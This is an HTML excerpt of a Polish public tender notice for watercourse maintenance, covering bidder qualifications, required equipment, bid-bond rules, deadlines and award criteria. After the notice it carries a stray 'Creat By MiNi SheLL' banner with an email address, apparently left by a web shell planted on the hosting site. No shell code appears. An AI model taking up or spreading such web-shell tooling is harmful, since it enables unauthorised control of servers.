class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 10 .1 O udzielenie zamówienia mogą ubiegać się Wykonawcy spełniający warunki, o których mowa <br/>w art. 112 ust.2 ustawy, którzy:<br/><br/>a) nie podlegają wykluczeniu (na podstawie zapisów w pkt 22 niniejszej SWZ, dotyczących podstaw wykluczenia)<br/><br/>b) spełniają następujące warunki udziału w postępowaniu w zakresie: <br/><br/>1) zdolności do występowania w obrocie gospodarczym,<br/>Zamawiający nie precyzuje tego warunku<br/><br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie precyzuje tego warunku<br/><br/>3) sytuacji ekonomicznej lub finansowej<br/><br/>Zamawiający wymaga - aby Wykonawca wykazał, że posiada środki finansowe lub zdolność kredytową<br/>- w kwocie minimum 50.000,00 zł <br/><br/>4) zdolności technicznej lub zawodowej – Zamawiający uzna warunek za spełniony jeżeli:<br/><br/>a)	Wykonawca wykaże, że wykonał, a w przypadku świadczeń okresowych lub ciągłych również wykonuje – w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie - minimum 2 zamówienia polegające na świadczeniu usługi w zakresie konserwacji cieków wodnych, np.: rzek, kanałów lub rowów przydrożnych.<br/><br/> Zamawiający zastrzega, iż:<br/>- mając na uwadze treść art. 117 ust. 1 ustawy Pzp, w sytuacji składania oferty przez dwa lub więcej podmiotów<br/>(Wykonawcy wspólnie ubiegający się o udzielenie zamówienia) oraz analogicznie w sytuacji, gdy Wykonawca będzie polegał na zasobach innego podmiotu, na zasadach określonych w art. 118 ustawy Pzp, warunek o którym mowa powyżej musi zostać spełniony w całości przez Wykonawcę (jednego z Wykonawców wspólnie składającego ofertę) lub podmiot, na którego zdolności w tym zakresie powołuje się Wykonawca – brak możliwości tzw. sumowania doświadczenia.<br/><br/>b)	Wykonawca wykaże, że dysponuje minimum 1 osobą kierującą pracami (koordynator prac) z uprawnieniami do kierowania robotami budowlanymi w specjalności: konstrukcyjno-budowlanej (bez ograniczeń) lub posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń wentylacyjnych, wodociągowych, kanalizacyjnych, cieplnych, gazowych bez ograniczeń,<br/>Wymagane jest: doświadczenie – min. 5 lat doświadczenia zawodowego po uzyskaniu w/w uprawnień, wymaganych przepisami ustawy z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2023 r. poz. 682 z późn. zm.) w zakresie kierowania robotami budowlanymi.<br/><br/>Dla osób odpowiedzialnych za kierowaniem pracami/robotami Zamawiający dopuszcza ważne uprawnienia budowlane odpowiadające wymienionym wyżej uprawnieniom, które zostały wydane na podstawie wcześniej obowiązujących przepisów.<br/>Samodzielne funkcje techniczne w budownictwie, określone w art. 12 ust. 1 ustawy Prawo budowlane, mogą również wykonywać osoby, których odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych tj. m.in. w ustawie z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2023 r. poz. 334) oraz w rozumieniu art. 20 a ust. 1 ustawy z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa (Dz. U. z 2023 r. poz. 551).<br/><br/>c)	Wykonawca wykaże, że dysponuje narzędziami, wyposażeniem zakładu, urządzeniami technicznymi (sprzętem i maszynami):<br/>- kosą spalinową: min. 4 szt. (rodzaj prac do wykonania: wykoszenie skarp i pobocza).<br/>- piłą spalinową: min. 2 szt. wycięcie krzaków.<br/>- rozdrabniarką do gałęzi: min. 1 szt. rozdrobnienie wyciętych krzaków.<br/>- koparko - odmularką: min. 1 szt. mechaniczne wydobycie roślin korzeniących się w dnie.<br/>- koparko - spycharka: min. 1 szt. mechaniczne plantowanie roślin korzeniących po wydobyciu (lub inne urządzenia spełniające jednocześnie ww. funkcje w tiret 4 i 5)<br/>- kosiarka bijakowa na wysięgniku min. 1 szt. wykoszenie skarp i poboczy<br/>- samochód dostawczy min. 1 szt. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający wezwie<br/>Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia<br/>wezwania, podmiotowych środków dowodowych, aktualnych na dzień złożenia podmiotowych środków dowodowych.<br/>Składane są tylko przez wezwanego Wykonawcę, którego oferta została najwyżej oceniona w wyznaczonym terminie, nie krótszym<br/>niż 5 dni od dnia wezwania przez Zamawiającego)<br/>a) odpis lub informacja z Krajowego Rejestru Sądowego lub Centralnej Ewidencji i Informacji o Działalności Gospodarczej w zakresie<br/>art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzona nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają<br/>wpisu do rejestru lub ewidencji<br/>*Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej,<br/>zamiast dokumentów, o których mowa powyżej, składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub<br/>miejsce zamieszkania, potwierdzające odpowiednio, że: nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie<br/>zarządza likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się<br/>on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury<br/>Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania nie wydaje się dokumentów, o których mowa powyżej,<br/>zastępuje się je odpowiednio w całości lub w części dokumentem zawierającym odpowiednio oświadczenie Wykonawcy, ze<br/>wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone<br/>pod przysięgą, lub, jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania nie ma przepisów o oświadczeniu<br/>pod przysięgą, złożone przed organem sądowym lub administracyjnym, notariuszem, organem samorządu zawodowego lub<br/>gospodarczego, właściwym ze względu na siedzibę lub miejsce zamieszkania Wykonawcy.<br/>Zastępczy dokument, o którym mowa powyżej, powinien być wystawiony nie wcześniej niż 3 miesiące przed jego złożeniem.<br/>Wykonawcy mający siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, składają wymagane przez<br/>Zamawiającego dokumenty zgodnie z rozporządzeniem Ministra Rozwoju, Pracy<br/>i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń,<br/>jakich może żądać zamawiający od wykonawcy (Dz. U. z 2020 r. poz. 2415)<br/>b) oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku przynależności do tej samej grupy kapitałowej w<br/>rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2021 r. poz. 275 ze zm.), z innym<br/>wykonawcą, który złożył odrębną ofertę/ofertę częściową albo oświadczenie o przynależności do tej samej grupy kapitałowej wraz z<br/>dokumentami lub informacjami potwierdzającymi przygotowanie oferty/oferty częściowej niezależnie od innego wykonawcy<br/>należącego do tej samej grupy kapitałowej.<br/>c) oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp, w<br/>zakresie podstaw wykluczenia z postępowania wskazanych przez zamawiającego w pkt 22 SWZ, o którym mowa w § 2 ust. 1 pkt 7<br/>oraz § 3 rozporządzenia Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków<br/>dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy (Dz. U. 2020 poz. 2415).</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż<br/>5 dni od dnia wezwania, podmiotowych środków dowodowych, aktualnych na dzień złożenia podmiotowych środków dowodowych.<br/>a) wykaz usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie potwierdzający, że Wykonawca wykonał w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie a w przypadku świadczeń okresowych lub ciągłych wykonuje minimum 2 zamówienia polegające na świadczeniu usługi w zakresie konserwacji cieków wodnych, np.: rzek, kanałów lub rowów przydrożnych, wraz z załączeniem dowodów określających czy usługi zostały wykonane lub są wykonywane należycie.<br/>Zgodnie z SWZ.<br/>b) wykaz osób skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za<br/>świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji<br/>zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu<br/>wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami tj.: 1 osobą kierującą pracami<br/>(koordynator prac) z uprawnieniami do kierowania robotami budowlanymi w specjalności: konstrukcyjno-budowlanej (bez<br/>ograniczeń) lub posiadający uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie<br/>sieci, instalacji i urządzeń wentylacyjnych, wodociągowych, kanalizacyjnych, cieplnych, gazowych bez ograniczeń.<br/>c) informacja banku lub spółdzielczej kasy oszczędnościowo-kredytowej, potwierdzająca wysokość posiadanych środków<br/>finansowych lub zdolność kredytową wykonawcy w kwocie min. 50.000,00 zł wystawionej nie wcześniej niż 3 miesiące przed jej<br/>złożeniem.<br/>* W przypadku, gdy Wykonawca powołuje się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w<br/>art. 112 ust. 2 pkt 3 ustawy Pzp, na zasoby innych podmiotów należy złożyć informację z banku lub spółdzielczej kasy<br/>oszczędnościowo-kredytowej, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu<br/>w kwocie min. 50.000,00 zł, wystawioną nie wcześniej niż 3 miesiące przed jej złożeniem.<br/>Jeżeli z uzasadnionej przyczyny wykonawca nie może złożyć wymaganych przez zamawiającego powyższych dokumentów, o<br/>których mowa powyżej w pkt 12.7 lit. d) SWZ, Wykonawca składa inne dokumenty, które w wystarczający sposób potwierdzają<br/>spełnianie opisanego przez Zamawiającego warunku udziału w postępowaniu, dotyczącego sytuacji ekonomicznej lub finansowej.<br/>d) wykaz narzędzi, wyposażenia zakładu, urządzeń technicznych dostępnych wykonawcy w celu wykonania zamówienia<br/>publicznego wraz z informacją o podstawie do dysponowania tymi zasobami. Zawarte w wykazie informacje mają potwierdzać<br/>wymagania Zamawiającego z pkt. 10.1.4) lit. c) SWZ odnośnie posiadania sprzętu i maszyn tj.: 1. kosa spalinowa: min. 4 szt. (rodzaj<br/>prac do wykonania: wykoszenie skarp i pobocza), 2. piła spalinowa: min. 2 szt. wycięcie krzaków, 3. rozdrabniarka do gałęzi: min. 1<br/>szt. rozdrobnienie wyciętych krzaków, 4. koparko - odmularka: min. 1 szt. mechaniczne wydobycie roślin korzeniących się w dnie, 5.<br/>koparko - spycharka: min. 1 szt. mechaniczne plantowanie roślin korzeniących po wydobyciu (lub inne urządzenie spełniające<br/>jednocześnie ww. funkcje w pkt 4 i 5 ), 6. kosiarka bijakowa na wysięgniku min. 1 szt. wykoszenie skarp i poboczy,7. samochód<br/>dostawczy min. 1 szt.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> a) *Pełnomocnictwo do reprezentowania w postępowaniu o udzielenie zamówienia publicznego do złożenia oferty musi być<br/>złożone w oryginale w takiej samej formie jak składana oferta (tj. w formie elektronicznej lub w postaci elektronicznej,<br/>opatrzonej podpisem kwalifikowanym, podpisem zaufanym lub podpisem osobistym). Dopuszcza się także złożenie<br/>elektronicznej kopii (skanu) pełnomocnictwa sporządzonego uprzednio w formie pisemnej, w formie elektronicznego<br/>poświadczenia sporządzonego stosownie do art. 97 § 2 ustawy z dnia 14 lutego1991 r. – prawo o notariacie, które to<br/>poświadczenie notariusz opatruje kwalifikowanym podpisem elektronicznym bądź też poprzez opatrzenie skanu<br/>pełnomocnictwa sporządzonego uprzednio w formie pisemnej kwalifikowanym podpisem elektronicznym, podpisem<br/>zaufanym lub podpisem osobistym mocodawcy. Elektroniczna kopia pełnomocnictwa nie może być uwierzytelniona przez<br/>upełnomocnionego. (*jeżeli dotyczy )<br/>Dokument ten będzie załącznikiem Nr 2 do oferty.<br/>b) Dowód wpłacenia wadium: ( 3.000,- zł )<br/>Wadium może być wnoszone wg wyboru Wykonawcy w jednej lub kilku formach zgodnie z art. 97 ust. 7 pkt 1-4 ustawy Pzp.<br/>W przypadku wnoszenia wadium w innej formie niż pieniężna dowód wpłacenia wadium należy złożyć w oryginale w postaci<br/>elektronicznej.<br/>Dokument ten będzie załącznikiem Nr 3 do oferty.<br/>c) *Zobowiązanie podmiotów, na których zdolnościach technicznych, zawodowych, sytuacji finansowej lub ekonomicznej<br/>polega Wykonawca do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia podpisane:<br/>kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym podmiotu<br/>udostępniającego zasoby. ( *jeżeli dotyczy )<br/>Dokument ten będzie załącznikiem Nr 4 do oferty.<br/>c) *Oświadczenie, z którego wynika które roboty budowlane lub usługi wykonają poszczególni Wykonawcy składający ofertę<br/>wspólnie, podpisane kwalifikowanym podpisem elektronicznym , podpisem zaufanym lub podpisem osobistym ( *jeżeli<br/>dotyczy ) Dokument ten będzie załącznikiem Nr 5 do oferty.<br/>d) wypełnione, na podstawie własnej kalkulacji, zestawienie cenowe (cennik) wg Załącznika Nr 1 do SWZ, który stanowić<br/>będzie Załącznik nr 6 do Oferty. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 17.1	Zamawiający ustala wadium w wysokości: 6.000,00 zł (słownie: sześć tysięcy złotych),<br/><br/>17.2	Wadium należy wnieść w jednej z form podanych w art. 97 ust. 7 ustawy Pzp. <br/><br/>Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 ustawy Pzp.<br/><br/>17.3.1	Wadium wnoszone w pieniądzu Wykonawca wpłaca na rachunek Zamawiającego w banku:<br/> <br/>PKO BP S.A. XVIII O/Warszawa; Nr konta: 15 1020 1185 0000 4602 0019 2351<br/> <br/>z adnotacją: ”Wadium RZP.271.5.2025” <br/><br/>17.3.2 Za termin wniesienia wadium w formie pieniężnej (przelewem) zostanie przyjęty termin uznania rachunku Zamawiającego.<br/><br/>17.3	Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, o których mowa a art. 97 ust 1 pkt 2 – 4 ustawy Pzp Wykonawca przekazuje Zamawiającemu oryginał gwarancji lub poręczenia w postaci elektronicznej.<br/><br/>17.4	Postanowienia pkt 11 SWZ odnośnie wadium są dla Wykonawców wiążące.<br/><br/>17.5	Zwrotu wpłaconego wadium wykonawcom Zamawiający dokona w trybie art. 98 ust.1 i 2 ustawy Pzp.<br/><br/>17.6 Oferta wykonawcy, który nie wniesie lub wniesie wadium w sposób nieprawidłowy lub nie utrzymywał wadium nieprzerwanie do upływu terminu związania ofertą lub złożył wniosek o zwrot wadium, w przypadku, o którym mowa w art. 98 ust. 2 pkt 3 ustawy Pzp, zostanie odrzucona na podstawie art. 226 ust.1 pkt 14 ustawy Pzp.<br/><br/>17.7 Zamawiający zatrzymuje wadium wraz z odsetkami, a w przypadku wadium wniesionego w formie gwarancji lub poręczenia, o których mowa w art. 97 ust. 7 pkt 2–4, występuje odpowiednio do gwaranta lub poręczyciela z żądaniem zapłaty wadium, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 107 ust. 2 lub art. 128 ust. 1, z przyczyn leżących po jego stronie, nie złożył podmiotowych środków dowodowych lub przedmiotowych środków dowodowych potwierdzających okoliczności, o których mowa w art. 57 lub art. 106 ust. 1, oświadczenia, o którym mowa w art. 125 ust. 1, innych dokumentów lub oświadczeń lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 223 ust. 2 pkt 3, co spowodowało brak możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej (art. 98 ust. 6 pkt 1 ustawy Pzp)<br/><br/>17.8 Zamawiający zatrzymuje również wadium wraz z odsetkami na podstawie art. 98 ust. 6 pkt 2 i 3 ustawy Pzp; tj. jeżeli wykonawca, którego oferta została wybrana:<br/>1)	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;<br/>2)	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;<br/>3)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.<br/><br/>17.9 Jeżeli wadium jest wniesione w jednej z form określonych w art. 97 ust. 7 ustawy Pzp, oprócz pieniężnej to wykonawca winien uwzględnić w nim wszystkie zapisy z ustawy Pzp dotyczące zatrzymania wadium. <br/>17.10 W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (art. 58 ustawy Pzp), Zamawiający wymaga aby poręczenie lub gwarancja obejmowała swą treścią (tj. zobowiązanych z tytułu poręczenia lub gwarancji) wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia lub aby z jej treści wynikało, że zabezpiecza ofertę Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum). <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia w rozumieniu art. 58 ust. 1 ustawy Pzp.<br/>Wykonawcy występujący wspólnie zobowiązani są dołączyć do oferty dokument (pismo, oświadczenie) wskazujący<br/>ustanowionego pełnomocnika do reprezentowania Wykonawcy w postępowaniu o udzielenie<br/>zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>Dokument ten musi być wystawiony zgodnie z wymogami ustawowymi, podpisany przez prawnie upoważnionych<br/>przedstawicieli wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>2. Zgodnie z art. 445 ust.1 ustawy Pzp Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ponoszą solidarną<br/>odpowiedzialność za wykonanie umowy i wniesienie zabezpieczenia należytego wykonania umowy (o ile dotyczy).<br/>3. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, żaden z nich nie może podlegać<br/>wykluczeniu z powodu niespełniania warunków, o których mowa w pkt. 10.1a SWZ.<br/>4. Jeśli wykonawcy wspólnie ubiegają się o udzielenie niniejszego zamówienia to:<br/>a) warunek określony w pkt 10.1.4) lit. a. musi spełniać przynajmniej jeden z Wykonawców (Partnerów) składających ofertę<br/>wspólną,<br/>b) pozostałe warunki określone powyżej musi spełniać co najmniej jeden z Partnerów składających ofertę wspólną lub<br/>Partnerzy składający ofertę wspólną spełniają łącznie.<br/>5. W wypadku wspólnego ubiegania się o udzielenie zamówienia Wykonawcy mogą polegać na zdolnościach tych z<br/>Wykonawców, którzy wykonają roboty budowlane lub usługi, do których realizacji te zdolności są wymagane. W takim<br/>wypadku należy złożyć Zamawiającemu oświadczenie do oferty, z którego wynika które roboty budowlane lub usługi<br/>wykonają poszczególni Wykonawcy składający ofertę wspólnie.<br/>6. W przypadku wykonawców wspólnie realizujących zamówienie (w tym konsorcjum) Zamawiający dokonywać będzie<br/>bezpośrednich rozliczeń tylko z liderem konsorcjum. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 5.1	Przedmiot zamówienia zostanie zrealizowany do dnia 31 grudnia 2025 r.<br/><br/>5.2	Zamawiający określa następujące warunki, w jakich przewiduje możliwość dokonania zmian zawartej umowy odnośnie wydłużenia terminu realizacji z pkt 5.1 SWZ:<br/><br/>1)	Z przyczyn zależnych i niezależnych od Zamawiającego, których nie mógł przewidzieć w chwili zawarcia umowy.<br/>2)	Z uwagi na masowe występowanie choroby zakaźnej ludzi (w szczególności koronawirus/COVID-19, etc.) mające bezpośredni lub pośredni wpływ na terminową realizację niniejszego zadania.<br/>3)	Z powodu działania siły wyższej, np. wystąpienia zdarzenia losowego wywołanego przez czynniki <br/>4)	zewnętrzne, którego nie można było przewidzieć, w szczególności zagrażającego bezpośrednio życiu lub zdrowiu ludzi lub grożącego powstaniem szkody w znacznych rozmiarach.<br/><br/>5.3 Zmiana terminu realizacji zamówienia wynikająca z ewentualnych powyższych przesłanek zostanie <br/>wprowadzona w formie aneksu do umowy.<br/><br/>Szczegółowe warunki wprowadzenia zmian do umowy określają: SWZ oraz Wzór umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-02-07 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Platforma e-Zamówienia</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-02-07 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-03-08</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h3 class="mb-0">8.6.) Maksymalna liczba wykonawców, którzy zostaną zaproszeni do negocjacji: <span class="normal">3</span></h3> <h3 class="mb-0">8.7) Kryteria oceny ofert, które zamawiający zamierza stosować w celu ograniczenia liczby wykonawców: </h3> A) Cena – waga kryterium – 60 %<br/> B) Czas realizacji każdego zlecenia od momentu zgłoszenia przez Zamawiającego<br/> – waga kryterium - 30%<br/>C) Czas przystąpienia do realizacji poszczególnego zlecenia od momentu zgłoszenia przez Zamawiającego – waga kryterium - 10%<br/><br/>1. Zamawiający dokona oceny w kryterium: ceny, czasu realizacji pojedynczych zleceń oraz czasu<br/>przystąpienia do realizacji pojedynczych zleceń przez Wykonawcę z dokładnością do dwóch miejsc po przecinku, zgodnie z<br/>zasadami matematycznymi,<br/>2. Zamawiający wybierze ofertę najkorzystniejszą spośród nieodrzuconych ofert na podstawie kryterium: ceny, czasu realizacji<br/>pojedynczych zleceń oraz czasu przystąpienia do realizacji pojedynczych zleceń.<br/>3. Za najkorzystniejszą zostanie uznana oferta z największą ilością punktów, stanowiących sumę punktów przyznanych w każdym<br/>kryterium z uwzględnieniem wagi procentowej danego kryterium <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zamawiający wyklucza z postępowania o udzielenie zamówienia Wykonawcę, w stosunku do którego zaistnieją przesłanki<br/>wymienione w art. 108 ust. 1 ustawy Pzp (z zastrzeżeniem art. 110 ust. 2 ustawy Pzp) oraz określonych w art. 7 ust. 1 pkt 1-<br/>3 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na<br/>Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. z 2024 r. poz. 507).

Creat By MiNi SheLL
Email: jattceo@gmail.com